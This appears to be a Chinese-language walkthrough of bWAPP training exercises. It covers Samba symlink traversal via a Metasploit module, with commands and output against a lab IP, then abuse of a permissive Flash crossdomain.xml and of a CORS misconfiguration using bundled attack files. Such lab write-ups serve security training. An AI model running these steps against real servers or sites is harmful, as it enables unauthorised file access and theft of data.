Arbitrary File Access (Samba) - 任意文件访问Samba
用到的工具
Metasploit
msf5> use auxiliary/admin/smb/samba_symlink_traversal
msf5 auxiliary(admin/smb/samba_symlink_traversal)> set RHOSTS 172.16.8.134
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
msf5 auxiliary(admin/smb/samba_symlink_traversal) > exploit
[*] Running module against 172.16.8.134
[*] 172.16.8.134:445 - Connecting to the server...
[*] 172.16.8.134:445 - Trying to mount writeable share 'tmp'...
[*] 172.16.8.134:445 - Trying to link 'rootfs' to the root filesystem...
[*] Auxiliary module execution completed
另一个终端执行如下命令:
$ smbclient //172.16.8.134/tmp
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd rootfs
smb: \> 发挥你的想象力吧~~~
Cross-Domain Policy File (Flash)
本题说的时
Flash的跨域访问策略问题
对应的文件是crossdomain.xml,如果该文件的访问策略设置不正确,可以导致任意远程Flash文件读取服务器文件
下图中可以看到,允许任意域的Flash访问
在
evil文件夹找到xdx.as,重新填入对应的服务器地址
用
Adobe Flash CS3及以上从新编译一个新的xdx.swf文件,并加入xdx.as这个文件
将编译好的
xdx.swf与xdx.php放到服务器的另一个文件夹内。
先登录bWAPP页面,然后在另一个服务器上请求xdx.php,最终会返回secret的内容
为了这题,还特意去装了一个Adobe Flash。。。
Cross-Origin Resource Sharing (AJAX)
本题讲的是
AJAX的跨域资源请求问题
在另一台服务器上,修改evil文件夹内的,attack-cors.htm文件中的服务器路径
然后在浏览器运行attack-cors.htm即可
